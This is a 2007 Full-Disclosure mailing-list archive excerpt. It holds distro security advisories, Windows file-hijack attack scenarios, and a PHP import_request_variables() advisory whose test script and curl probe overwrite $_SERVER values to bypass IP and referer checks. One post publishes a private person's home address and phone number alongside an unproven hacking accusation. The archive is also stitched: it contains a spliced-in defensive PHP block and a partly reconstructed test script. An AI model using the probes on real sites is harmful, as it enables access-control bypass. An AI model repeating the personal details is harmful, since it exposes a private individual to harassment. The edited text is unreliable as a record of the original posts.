0qj1yJugJ+Mg+6GdPqIulnk=
=9Czc
-----END PGP SIGNATURE-----

From security at mandriva.com Thu Mar 8 15:40:46 2007
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 08 Mar 2007 08:40:46 -0700
Subject: [Full-disclosure] [ MDKSA-2007:054 ] - Updated kdelibs packages to address DoS issue in KDE Javascript
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:054
http://www.mandriva.com/security/
_______________________________________________________________________

Package : kdelibs
Date    : March 8, 2007
Affected: 2007.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

ecma/kjs_html.cpp in KDE JavaScript (KJS), as used in Konqueror, allows remote attackers to cause a denial of service (crash) by accessing the content of an iframe with an ftp:// URI in the src attribute, probably due to a NULL pointer dereference.

Updated packages have been patched to address this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1308
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.0:
1d8397f15e58c6ebc8add4080524e8ba  2007.0/i586/kdelibs-common-3.5.4-19.3mdv2007.0.i586.rpm
f9f0624e36296f15aa5f7bfe51765335  2007.0/i586/kdelibs-devel-doc-3.5.4-19.3mdv2007.0.i586.rpm
36d61d7ad928fbee40606a82028446ad  2007.0/i586/libkdecore4-3.5.4-19.3mdv2007.0.i586.rpm
15b28472271a57c834b27259a29f07da  2007.0/i586/libkdecore4-devel-3.5.4-19.3mdv2007.0.i586.rpm
1763a83f2c1b2fe368983ee87fad4fc2  2007.0/SRPMS/kdelibs-3.5.4-19.3mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
770bb5b58a92a6e8bf213f814346293c  2007.0/x86_64/kdelibs-common-3.5.4-19.3mdv2007.0.x86_64.rpm
8daded5cdd67051ceca12750140e551c  2007.0/x86_64/kdelibs-devel-doc-3.5.4-19.3mdv2007.0.x86_64.rpm
aac88e6d7fd426401bfa11505550dcb4  2007.0/x86_64/lib64kdecore4-3.5.4-19.3mdv2007.0.x86_64.rpm
5c7becc6933c5d13761d561999691594  2007.0/x86_64/lib64kdecore4-devel-3.5.4-19.3mdv2007.0.x86_64.rpm
1763a83f2c1b2fe368983ee87fad4fc2  2007.0/SRPMS/kdelibs-3.5.4-19.3mdv2007.0.src.rpm

Corporate 4.0:
358b45acbccb6b99d05748abc02f9dd7  corporate/4.0/i586/kdelibs-arts-3.5.4-2.4.20060mlcs4.i586.rpm
63cd48e403757866aa7979e5d7d906de  corporate/4.0/i586/kdelibs-common-3.5.4-2.4.20060mlcs4.i586.rpm
9aa0299ec063ea41d52da7ba446757a4  corporate/4.0/i586/kdelibs-devel-doc-3.5.4-2.4.20060mlcs4.i586.rpm
ad7439a70a0dd461073c6d38e73a5622  corporate/4.0/i586/libkdecore4-3.5.4-2.4.20060mlcs4.i586.rpm
9b1fd095f5735fbbc2e337fbb954b524  corporate/4.0/i586/libkdecore4-devel-3.5.4-2.4.20060mlcs4.i586.rpm
2c987a7ed1c263de3dde211cb0dee772  corporate/4.0/SRPMS/kdelibs-3.5.4-2.4.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
3c1ff52dc6a7347a2648f4c3628a3e3d  corporate/4.0/x86_64/kdelibs-arts-3.5.4-2.4.20060mlcs4.x86_64.rpm
1d201913a24f345f77a53ea1ebc850b7  corporate/4.0/x86_64/kdelibs-common-3.5.4-2.4.20060mlcs4.x86_64.rpm
4ec74770c6dc7343092000db74ca5ca0  corporate/4.0/x86_64/kdelibs-devel-doc-3.5.4-2.4.20060mlcs4.x86_64.rpm
b4d99dcd875a95c8b1301bcf54860306  corporate/4.0/x86_64/lib64kdecore4-3.5.4-2.4.20060mlcs4.x86_64.rpm
93cfdbf02993812bb52ae0d2e26a0c70  corporate/4.0/x86_64/lib64kdecore4-devel-3.5.4-2.4.20060mlcs4.x86_64.rpm
2c987a7ed1c263de3dde211cb0dee772  corporate/4.0/SRPMS/kdelibs-3.5.4-2.4.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF8APFmqjQ0CJFipgRAgqzAJ9DmuNRfDFu7K1Xd1PqGkwg1dwNAwCeNpf8
+pvpIpYttsl6uOacHpxXXkQ=
=+gJf
-----END PGP SIGNATURE-----

From sniffikins at yahoo.com Thu Mar 8 19:10:06 2007
From: sniffikins at yahoo.com (Jaime Demetur)
Date: Thu, 8 Mar 2007 11:10:06 -0800 (PST)
Subject: [Full-disclosure] YouTube email exploit being used by Casey Nunez AKA TheDramaTube AKA The Hurricane
Message-ID: <565625.60760.qm@web58905.mail.re1.yahoo.com>

YouTube user TheDramaTube (AKA The Hurricane) is actively using a YouTube email exploit that, when opened, logs the reader out of their and immediately gives him access. Beware of any messages sent by this user.

The last time this exploit was used the subject line was "rfgt". In the body of the email was simply "r". The person who received the email was then logged out and Casey Nunez then had access to their account, with the victim unable to log back in for a while.

Casey Nunez
247 Marmandie Ave., Lot #56
River Ridge, LA
70123-1145
Phone# 504-250-1119

Be safe out there,
Jamie

---------------------------------
Don't get soaked. Take a quick peek at the forecast with theYahoo! Search weather shortcut.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/de2f5b5e/attachment.html

From kokanin at gmail.com Thu Mar 8 20:06:51 2007
From: kokanin at gmail.com (Knud Erik Højgaard)
Date: Thu, 8 Mar 2007 21:06:51 +0100
Subject: [Full-disclosure] YouTube email exploit being used by Casey Nunez AKA TheDramaTube AKA The Hurricane
In-Reply-To: <565625.60760.qm@web58905.mail.re1.yahoo.com>
References: <565625.60760.qm@web58905.mail.re1.yahoo.com>
Message-ID:

bla bla bla, evidence or it didn't happen.

On 3/8/07, Jaime Demetur wrote:
> YouTube user TheDramaTube (AKA The Hurricane) is actively using a YouTube
> email exploit that, when opened, logs the reader out of their and
> immediately gives him access. Beware of any messages sent by this user.
>
> The last time this exploit was used the subject line was "rfgt". In the body
> of the email was simply "r". The person who received the email was then
> logged out and Casey Nunez then had access to their account, with the victim
> unable to log back in for a while.
>
> Casey Nunez
> 247 Marmandie Ave., Lot #56
> River Ridge, LA
> 70123-1145
> Phone# 504-250-1119
>
> Be safe out there,
> Jamie
>
>
>
> ________________________________
> Don't get soaked. Take a quick peek at the forecast
> with theYahoo! Search weather shortcut.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From 3APA3A at SECURITY.NNOV.RU Thu Mar 8 19:58:37 2007
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 8 Mar 2007 22:58:37 +0300
Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
Message-ID: <1199291182.20070308225837@SECURITY.NNOV.RU>

This is an article I promised to publish after the Windows ReadDirectoryChangesW (CVE-2007-0843) [1] issue.
It should explain why you must never place secure data inside an insecure directory.

Title:    Microsoft Windows Vista/2003/XP/2000 file management security issues
Author:   3APA3A, http://securityvulns.com/
Vendor:   Microsoft (and potentially other vendors)
Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit for Windows 2000 and different utilities.
Access Vector: Local
Type:     multiple/complex (weak design, insecure file operations, etc)
Original advisory: http://securityvulns.com/advisories/winfiles.asp
Securityvulns.com news: http://security.nnov.ru/news/Microsoft/Windows/files.html

0. Intro

This article contains a set of attack scenarios to demonstrate security weaknesses in a few very common Windows management practices. None of the problems explained is critical, yet combined together they should force you to review your security practices. I can't even say "vulnerabilities", because there is nothing you can call a "vulnerability". It's just something you believe is secure, and it's not.

1.1 Problem: inability to create a secured file / folder in a public one.
Attack: folder hijack attack

First, it's simply impossible with the standard Windows interface to create something secured in an insecure folder.

Scenario 1.1:

Bob wishes to create a "Bob private data" folder in the "Public" folder to place a few private files. "Public" has at least "Write" permissions for the "User" group.

Bob:
 I    Creates the "Bob private data" folder
 II   Sets permissions for the folder to only allow access to the folder to himself
 III  Copies private files into the folder

Alice wants to get access to the folder Bob created. She
 Ia   Immediately after the folder is created, deletes the "Bob private data" folder and creates a "Bob private data" folder again (or simply takes ownership of the "Bob private data" folder if permissions allow). It makes Alice the folder owner.
 IIa  Immediately after Bob sets permissions, she grants herself full control over the folder. She can do it as the folder owner.
 IIIa Reads Bob's private files, because file permissions are inherited from the folder

Alice can use the "Spydir" (http://securityvulns.com/soft/) tool to monitor file access and automate this process.

As you can see, [1] elevates this problem significantly.

This is not a new attack. Unix has the "umask" command to protect administrators and users. Currently, Windows has nothing similar. The CreateFile() API supports setting the file ACL on file creation (just like open() allows setting the mode on POSIX systems). An ACL can be securely set only on newly created files. This raises the problem of secure file creation.

1.2 Problem: Inability to lock / securely change permissions of an already created file
Attack: pre-open file/directory attack.

There are a few classes of insecure file creation attacks (attempt to open an existing file), exploitable under Unix with hardlinks or symlinks. It's believed Windows is not vulnerable to these attacks because

 I.   There are no symlinks under Windows. Symlink attacks are not possible.
 II.  Security information in NTFS is not stored as a part of the directory entry, it's a part of the file data. Hard link attacks are not possible.
 III. File locks in Windows are mandatory. It means, if one application locks a file, another application can not open this file, if the user doesn't have backup privileges. It mitigates different file-based attacks.

There is at least one scenario where an attacker can succeed without a symbolic link: to steal data written to a file created without a check for file existence, regardless of file locks and permissions.

Attack description: if the attacker can predict the filename to be written, he can create the file, open it and share this file for all types of access. Because locking and permissions are only checked on file open, the attacker retains access to the file even if it's locked and its permissions are changed to deny file access to the attacker.

Exploit (or useful tool): http://securityvulns.com/files/spyfile.c
Opens a file, shares it for different types of access and logs changes, keeping the file open. A compiled version is available from http://securityvulns.com/soft/

Scenario 1.2.1:

Bob is now aware of the folder hijack attack. He uses xcopy /O /U /S to synchronize his files to a newly created folder. xcopy /O copies security information (ownership and permissions) before writing data to the file. Alice uses "Spydir" to monitor newly created folders and files in Bob's directory. She uses Spyfile to create spoofed files in the target directory and waits for Bob to run xcopy. Now she has full control over the content of Bob's files, despite the fact that she has no permissions to access these files.

In the same way, directory content may be monitored by pre-opening the directory.

Scenario 1.2.2:

An enterprise directory structure is replicated every day to another user-writable location in order to allow users to recover suddenly deleted or modified files. xcopy or robocopy (from the resource kit) is used for replication. An attacker can hijack the content of newly created files in newly created folders.

The same problem may happen on archive extraction or backup restoration.

Vulnerable applications: xcopy (from all Windows versions), robocopy (Windows 2000 Resource Kit), different archivers, backup restoration utilities

By default, xcopy warns the user that the file exists, unless the /Y or /U key is specified. But

 I.   /Y is always specified for replication
 II.  /Y can be specified via the COPYCMD environment variable. The COPYCMD environment variable can be created in the autoexec.bat file. Different situations are possible where autoexec.bat is writable by the attacker, if:
      - Default Windows 2000 permissions are used or applied with domain policy [2].
      - One can try to re-create autoexec.bat using the POSIX subsystem
 III. Neither xcopy nor other utilities warn the user on an existing directory. The pre-open directory attack will always succeed.

As you can see, [1] again dramatically elevates this problem.

1.3 Problem: user can completely block access to files
Attack: open file deletion (including Windows file replication service DoS)

If a file is deleted while it's open, it is still present in the file system under its old name until close. Any operation on this file (including attribute requests) fails, regardless of application rights and permissions (including backup ones).

Exploit: use spyfile, delete the file while it's spied. Now, without closing spyfile, attempt any operation on this file (e.g. try to find its ownership).

Scenario 1.3.1

Now Bob has found a copy application to securely copy files. It deletes the old file before creating the new one. But it fails if Alice tries to spy on Bob's files, because the attempt to delete the file succeeds, but the file is still present and is unmanageable.

Scenario 1.3.2

Windows file replication service (FRS) is used to replicate data between 2 public DFS folders to distribute load. The folder has permissions:

 Everyone: Add & read
 Creator Owner: Full Control

Thus, Alice has no permissions to delete files created by Bob. The replicated folder is available as a share on 2 different servers: \\SERVER1\Share and \\SERVER2\Share. Bob is connected to \\SERVER1\Share. Alice uses "Spydir" to monitor file creation by Bob. Every time Bob creates a new file on \\SERVER1\Share, Alice uses spyfile to create a file with the same name on \\SERVER2\Share. It effectively leads to an FRS collision. While trying to resolve the collision, FRS fails to delete the file created by Alice and Bob's file is deleted (the original file is moved to a special hidden folder only accessible by the administrator).

Workaround: never try to use creator-owner based permissions in replicated folders.

Again, [1] seriously escalates this problem.

2. Conclusion:

It's simply impossible to securely create something in a public folder. At least DoS conditions are always possible.

Developers should not consider mandatory file locking as a security feature.
Developers should care about secure file creation to store sensitive information. CREATE_NEW should always be used and the ACL should be set with lpSecurityAttributes of CreateFile. No attempt to open an existing file should be made.

Never try to create a secure folder in a public one. If you are forced to, disconnect all users before this operation.

Never use replication, archive extraction or backup restore to a user-accessible folder.

Bob and Alice should finally marry.

3. Vendor:

All timelines are the same as with [1].

[1]. Microsoft Windows ReadDirectoryChangesW information leak (CVE-2007-0843)
http://security.nnov.ru/news/Microsoft/Windows/ReadDirector.html
[2]. Windows 2000 system partition weak default permissions
http://securityvulns.ru/news2205.html

--
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }     You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/

From stefano.dipaola at wisec.it Thu Mar 8 22:30:49 2007
From: stefano.dipaola at wisec.it (Stefano Di Paola)
Date: Thu, 08 Mar 2007 23:30:49 +0100
Subject: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite
Message-ID: <1173393049.9040.10.camel@laptop>

PHP import_request_variables() arbitrary variable overwrite

Name
Using import_request_variables() you can overwrite $_* and $* (any php variable).

Systems Affected
PHP >=4.0.7 <=5.2.1

Severity
High

Vendor
http://www.php.net/

Advisory
http://www.wisec.it/vulns.php?id=10
http://www.wisec.it/vuln_10.txt

Authors
Stefano `wisec` di Paola (stefano.dipaola at wisec.it)
Francesco `ascii` Ongaro (ascii at ush.it)

Date
20060307

I. BACKGROUND

PHP is a scripting language. Since in the past PHP enabled GLOBALS by default, programmers wrote applications using this input method; nowadays the globals-on configuration has gone (while still used by many web hosting companies) and programmers, instead of rewriting their code, added patches to re-implement superglobals on their own.
These codes gave developers more troubles than benefits, so PHP developers wrote a function to securely import a part of the whole "_REQUEST"; this function is named import_request_variables() and exists since PHP 4.0.7.

II. DESCRIPTION

From the PHP manual:

[quote]
Imports GET/POST/Cookie variables into the global scope. It is useful if you disable register_globals, but would like to see some variables in the global scope.
[/quote]

So import_request_variables() emulates register_globals on and is a bit different from extract().

[quote]
Note: Although the prefix parameter is optional, you will get an E_NOTICE level error if you specify no prefix, or specify an empty string as a prefix. This is a possible security hazard. Notice level errors are not displayed using the default error reporting level.
[/quote]

They warn you about the prefix thing, and this is right for two reasons: the first is that without a prefix you have the same problems as globals on (but it's also true that if you code everything with the prefix you return to the starting point). The second is the one explained in this advisory: using the function import_request_variables() enables people to overwrite the following arrays:

$_GET
$_POST
$_COOKIE
$_FILES
$_SERVER
$_SESSION

and all the others not mentioned. We are conducting further investigations on _FILES; it seems possible to overwrite the array but we are not sure that it could be used to trick file upload scripts.

Given the specified entry points (the first argument of the function is a case insensitive string of the input methods that will be imported, G for GET, P for POST and C for COOKIE) a remote attacker will be able to overwrite any internal and protected array.

The result is that if you use REGISTER GLOBALS ON you are MUCH MORE safe.

There is a little bonus: as highlighted in the code snippets in the following ANALYSIS section, the P char will enable both the POST and FILES entry points, so import_request_variables('GPC') will give a global scope to everything specified in GET, POST, COOKIE and FILES.

III. ANALYSIS

import_request_variables() is not new to vulnerabilities: consider this change log entry for 24 Nov 2005, PHP 5.1.

[quote]
- Fixed potential GLOBALS overwrite via import_request_variables() and possible crash and/or memory corruption. (Ilia)
[/quote]

Use the following test suite: run the script in a writable directory inside a document root, then point your browser to the test.php files and make your tests.

--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8
#!/bin/bash

mkdir hack-php_import_request_variables && cd hack-php_import_request_variables

echo "Testing cli.."
echo "register_globals = Off" > php-ini-globals-off
php -c php-ini-globals-off -r "echo (int)ini_get('register_globals');"
echo "register_globals = On" > php-ini-globals-on
php -c php-ini-globals-on -r "echo (int)ini_get('register_globals');"

echo "Testing mod.."
mkdir globals-on && mkdir globals-off

cat > globals-on/test.php << TOKEN
<?php
// The opening of this script was lost when the archive stripped HTML tags;
// the call under test is restored here from the advisory text above.
import_request_variables('GPC');
echo 'GET'."\n";     print_r(\$_GET);
echo 'POST'."\n";    print_r(\$_POST);
echo 'COOKIE'."\n";  print_r(\$_COOKIE);
echo 'SERVER'."\n";  print_r(\$_SERVER);
echo 'SESSION'."\n"; print_r(\$_SESSION);
echo 'FILES'."\n";   print_r(\$_FILES);
?>
TOKEN

cp globals-on/test.php globals-off/test.php

echo "php_value register_globals on" > globals-on/.htaccess
echo "php_value register_globals off" > globals-off/.htaccess
--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

Suggested tests are:

- test.php?_SERVER=string (overwrite $_SERVER array and make it a string)
- test.php?_SERVER[REMOTE_ADDR]=bypass client ip validation
- test.php?_SERVER[HTTP_REFERER]=bypass referer validation

Etc.. Add your POST/COOKIE/FILES probes.

The vulnerable code is in the following files:

./ext/standard/basic_functions.c:PHP_FUNCTION(import_request_variables)
./Zend/zend_hash.c:ZEND_API void zend_hash_apply_with_arguments(HashTable *ht, apply_func_args_t apply_func, int num_args, ...)

Vulnerable code snippet:

PHP_FUNCTION(import_request_variables)
{
    [..]
    if (prefix_len == 0) {
        php_error_docref(NULL TSRMLS_CC, E_NOTICE, "No prefix specified - possible security hazard");
    }
    [..]
    for (p = types; p && *p; p++) {
        switch (*p) {
            case 'g':
            case 'G':
                zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_GET]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len);
                break;
            case 'p':
            case 'P':
                zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_POST]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len);
                zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_FILES]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len);
                break;
            case 'c':
            case 'C':
                zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_COOKIE]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len);
                break;
        }
    }
    [..]
}

As you can see there are different entry points but the "output" is the global scope.

--- >8 --- >8 --- >8 --- >8 --- example.php --- >8 --- >8 --- >8 --- >8
--- >8 --- >8 --- >8 --- >8 --- ----------- --- >8 --- >8 --- >8 --- >8

curl http://URL/example.php?_SERVER[REMOTE_ADDR]=10.1.1.1

Will give you:

Hello admin!
Now that this is disclosed, probably you would consider this url:

http://www.google.com/codesearch?q=lang%3Aphp+import_request_variables

IV. DETECTION

All the PHP versions >=4.0.7 <=5.2.1 are vulnerable.

V. WORKAROUND

Dunno.

VI. VENDOR RESPONSE

Will fix, probably.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20060301 Discovery
20060302 Private testing
20060304 Tea time
20060305 Snowboard lesson
20060308 Full disclosure

IX. CREDIT

Stefano di Paola is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2007 Stefano di Paola

Note: this exploit is DOUBLE LICENSED,
1. if you'll use it for personal and non-profit purposes you can apply GPL v2 and above.
2. In the case you plan to:
   a. use our code in any commercial context
   b. implement this code in your non-GPL application
   c. use this code during a Penetration Test
   d. make any profit from it
   you need to contact me in order to obtain a _commercial license_.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer
Web: www.wisec.it
..................
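The advisory above lists no workaround. The root of the problem it describes is that import_request_variables() writes request keys straight into the global symbol table, so a key named "_SERVER" lands on top of $_SERVER. The added example below (written for this archive; it is not code from the advisory, from wisec.it or from PHP itself) shows the replacement pattern a reviewer would ask for: copy only an explicit allowlist of expected keys into a plain local array, refuse any key that could name a superglobal, and never touch the global scope. The function name collect_request_vars() and the sample request arrays are this example's own inventions; the probe values are modelled on the test.php?_SERVER[REMOTE_ADDR]=... probe from the advisory.

```php
<?php
// Added example (not code from the advisory): a replacement for
// import_request_variables() that never writes into the global scope.
// Only an explicit allowlist of keys is copied, and any key that could
// name a superglobal ($_SERVER, $_SESSION, $_FILES, ...) or $GLOBALS is
// refused outright. Function and variable names are this example's own.

/**
 * Copy allowlisted request keys into a plain array.
 *
 * @param array[]  $sources  Ordered request arrays, e.g. [$_GET, $_POST, $_COOKIE]
 *                           (the "GPC" order of import_request_variables()).
 *                           The first source that carries a key wins; a later
 *                           source cannot overwrite it.
 * @param string[] $allowed  Exact key names the script expects.
 * @param string[] $rejected Filled with every key that was refused (by reference).
 */
function collect_request_vars(array $sources, array $allowed, ?array &$rejected = null): array
{
    $out = [];
    $rejected = [];
    foreach ($sources as $source) {
        foreach ($source as $key => $value) {
            // Integer keys and names beginning with "_" (or "GLOBALS") are never
            // imported, so request data cannot shadow a protected array.
            if (!is_string($key) || $key === '' || $key[0] === '_' || $key === 'GLOBALS') {
                $rejected[] = (string) $key;
                continue;
            }
            if (!in_array($key, $allowed, true)) {
                $rejected[] = $key;
                continue;
            }
            if (!array_key_exists($key, $out)) {
                $out[$key] = $value;
            }
        }
    }
    return $out;
}

// Constructed request data, modelled on the advisory's probe
// test.php?_SERVER[REMOTE_ADDR]=... (sample values, not a live request).
$sample_get    = ['_SERVER' => ['REMOTE_ADDR' => '10.1.1.1'], 'page' => '2'];
$sample_cookie = ['lang' => 'en', 'page' => '99'];

$vars = collect_request_vars([$sample_get, $sample_cookie], ['page', 'lang'], $rejected);

// The _SERVER key is refused and the cookie's "page" cannot override GET's.
assert($vars === ['page' => '2', 'lang' => 'en']);
assert($rejected === ['_SERVER']);

// $_SERVER['REMOTE_ADDR'] still holds whatever the SAPI set: nothing above
// touched the global symbol table, which is the whole point.
echo 'imported: ', json_encode($vars), PHP_EOL;
echo 'rejected: ', json_encode($rejected), PHP_EOL;
```

Run it with the PHP CLI (php collect.php). The point of returning an array instead of creating variables is that the script then reads $vars['page'] explicitly, so there is no global name for a request parameter to collide with; the rejected list is worth logging, because a request carrying keys like _SERVER or _SESSION is exactly the probe the advisory describes and is a useful detection signal on its own.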
From ascii at katamail.com Fri Mar 9 00:11:28 2007
From: ascii at katamail.com (ascii)
Date: Fri, 09 Mar 2007 01:11:28 +0100
Subject: [Full-disclosure] PHP import_request_variables() vs extract()
Message-ID: <45F0A630.1000804@katamail.com>

Please note that also extract() will override any variable excluding $GLOBALS, but the main difference is that on http://it2.php.net/extract you are advised not to use "extract() against untrusted data, like user-input ($_GET, ...)."

[quote]
if you want to run old code that relies on register_globals temporarily, make sure you use one of the non-overwriting extract_type values such as EXTR_SKIP and be aware that you should extract in the same order that's defined in variables_order within the php.ini
[/quote]

In fact extract() has an EXTR_SKIP flag that implements this behaviour:

[quote]
If there is a collision, don't overwrite the existing variable.
[/quote]

Using extract() with EXTR_SKIP will give you something like GLOBALS ON that is safe if compared with what happens using extract($_GET); or import_request_variables('G');

--- >8 --- >8 --- >8 --- >8 --- test1.php --- >8 --- >8 --- >8 --- >8
--- >8 --- >8 --- >8 --- >8 --- --------- --- >8 --- >8 --- >8 --- >8

Demo: test1.php?SERVER=abc
Expected result: the _SERVER array will become a string

The moral is that while an insecure usage of extract() by a developer could be his fault, there is no secure usage of import_request_variables() and this is surely a PHP fault.

Regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

From johnc at grok.org.uk Fri Mar 9 01:21:28 2007
From: johnc at grok.org.uk (John Cartwright)
Date: Fri, 9 Mar 2007 01:21:28 +0000
Subject: [Full-disclosure] List Charter
Message-ID: <20070309012128.GA20963@grok.org.uk>

[Full-Disclosure] Mailing List Charter
John Cartwright

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk.
The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk, send the word 'help' in either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance.

It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management.

An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list.
Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected.

Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/unsubscription mails to this address, use the -request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management.

Alterations will be made after consultation with list members and a consensus has been reached.

From ktriv3di at msn.com Fri Mar 9 02:21:03 2007
From: ktriv3di at msn.com (Justin Boem)
Date: Thu, 8 Mar 2007 18:21:03 -0800
Subject: [Full-disclosure] Good resources on Web 2.0
Message-ID:

List,

I am looking for some good resources on Web 2.0 and Security. I know this is a huge topic, but any references to good books, articles, websites, tools, etc would be great

Thanks
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/5f314a64/attachment.html

From michaelslists at gmail.com Fri Mar 9 02:38:21 2007
From: michaelslists at gmail.com (Michael Silk)
Date: Fri, 9 Mar 2007 13:38:21 +1100
Subject: [Full-disclosure] Good resources on Web 2.0
In-Reply-To:
References:
Message-ID: <5e01c29a0703081838i1eda7c21q203e34f35f17786a@mail.gmail.com>

On 3/9/07, Justin Boem wrote:
>
> List,
>
> I am looking for some good resources on Web 2.0 and Security. I know this
> is a huge topic, but any references to good books, articles, websites,
> tools, etc would be great
>

"web 2.0" security is the same as any other type of web security. the same
principles apply.

Thanks

>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
mike
00110001 <3 00110111
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070309/daf8dd01/attachment.html

From kees at ubuntu.com Fri Mar 9 02:39:34 2007
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 8 Mar 2007 18:39:34 -0800
Subject: [Full-disclosure] [USN-433-1] Xine vulnerability
Message-ID: <20070309023934.GR6805@outflux.net>

===========================================================
Ubuntu Security Notice USN-433-1             March 09, 2007
xine-lib vulnerability
CVE-2007-1246
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  libxine1c2                      1.0.1-1ubuntu10.8

Ubuntu 6.06 LTS:
  libxine-main1                   1.1.1+ubuntu2-7.6

Ubuntu 6.10:
  libxine1                        1.1.2+repacked1-0ubuntu3.3

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Moritz Jodeit discovered that the DMO loader of Xine did not correctly validate the size of an allocated buffer. By tricking a user into opening a specially crafted media file, an attacker could execute arbitrary code with the user's privileges.

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.8.diff.gz
      Size/MD5:    12146 b32c486037c9bd487f47677d77057aad
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.8.dsc
      Size/MD5:     1187 e4c778b992408ec8e46e5500921545af
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz
